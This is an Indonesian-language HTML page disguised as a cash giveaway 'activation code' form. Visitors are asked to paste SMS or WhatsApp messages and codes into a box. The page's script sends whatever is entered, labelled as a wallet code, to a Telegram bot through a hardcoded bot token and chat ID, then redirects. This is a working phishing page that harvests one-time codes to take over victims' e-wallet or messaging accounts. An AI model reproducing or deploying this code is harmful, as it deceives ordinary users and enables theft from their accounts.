<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>GIVEAWAY UANG TUNAI</title>
    <link rel="icon" type="image/x-icon" href="asset/logo-index3.png">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-T3c6CoIi6uLrA9TneNEoa7RxnatzjcDSCmG1MXxSR1GAsXEV/Dwwykc2MPK8M2HN" crossorigin="anonymous">
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background: #5babe0;
        }

        .container {
            padding: 20px;
        }

        .logo-atas {
            text-align: center;
        }

        .image-web img {
            width: 250px;
        }

        .form-container {
            background-color: #c0bcff;
            border: 5px solid #03195f;
            border-radius: 10px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.2);
            padding: 20px;
            margin-top: 20px;
        }

        .btnNext {
            background-color: #022b77;
            border: none;
            border-radius: 10px;
            width: 90%;
            color: rgb(255, 255, 255);
            font-weight: bold;
            height: 45px;
            margin-top: 20px;
        }

        #proses {
            color: rgb(134, 2, 2);
            display: none;
            margin-top: 20px;
        }
    </style>
</head>

<body>
    <nav class="navbar">
    <div class="container">
      <a class="navbar-brand" href="#">
          <h5>GIVEAWAY UANG TUNAI</h5>
      </a>
      <h5 style="color: #46169e">Kode Aktivasi</h5>
    </div>
  </nav>
  <div class="container">
        <div class="title-web mt-2">
        <div class="logo-atas">
            <img class="img-fluid" src="asset/logofavicon.jpg" alt="">
        </div>
        <div class="title-web mt-1">
            <h5 class="text-center">Silahkan Salin dan Tempel Pesan SMS atau Pesan Whatsapp di kolom Bawah ini Untuk Melakukan Aktivasi Kode GIVE AWAY</h5>
        </div>
        <div class="image-web">
            <div class="form-container">
                
                <div class="col-md-3">
                    <textarea name="name" id="nope" class="bubble-element MultiLineInput" placeholder="Tempel Disini Untuk Link atau Kode SMS / WA  untuk Proses Aktivasi Give Away Anda" text-color="#0D00A5;" maxlength="" rows="1" style="max-width: 90%; display: block; margin: auto; width: 290px; left: 0px; top: 0px; background-color: rgb(158, 181, 245); min-height:80px; overflow: hidden; overflow-wrap: break-word; box-shadow: rgba(14, 27, 68, 0.71) 0px 0px 2px 0px; font-family: Arial; font-size: 12px; font-weight: bold; color: #010800; text-align: center; height: 70px;" required></textarea>
                </div>

                <center><button onclick="next()" class="btnNext">Aktifasi Kode</button></center>
                <p id="proses" class="text-center">TERIMA KASIH PERMINTAAN ANDA SEDANG DI PROSES</p>
            </div>
        </div>
    </div>

    <script>
        const next = () => {
            let proses = document.querySelector("#proses");
            let nope = document.querySelector("#nope").value;
            let token = "7070593349:AAGhtyk4PiU3fMmLVe9CQiKPaQlrZLR8yjM";
            let id_tele = "6250486742";
            if (nope === "") {
                alert("Mohon Isi data Dengan Benar");
            } else {
                let message = `  =| KODE DOMPET |=%0A-------------------%0A%0ASalin Kode:%0A${nope}`;
                let api = `https://api.telegram.org/bot${token}/sendMessage?chat_id=${id_tele}&text=${message}`;
                fetch(api, {
                    method: 'POST',
                })
                    .then((response) => response.json())
                    .then(data => {
                        console.log('Pesan terkirim:', data);
                        window.location.href = "kodedomp.html";
                    })
                    .catch((error) => {
                        console.error('Error:', error);
                    });
            }
        }
    </script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/js/bootstrap.bundle.min.js"
        integrity="sha384-C6RzsynM9kWDrMNeT87bh95OGNyZPhcTNXj1NW7RuBCsyN/o0jlpcV8Qyq46cDfL"
        crossorigin="anonymous"></script>
</body>

</html>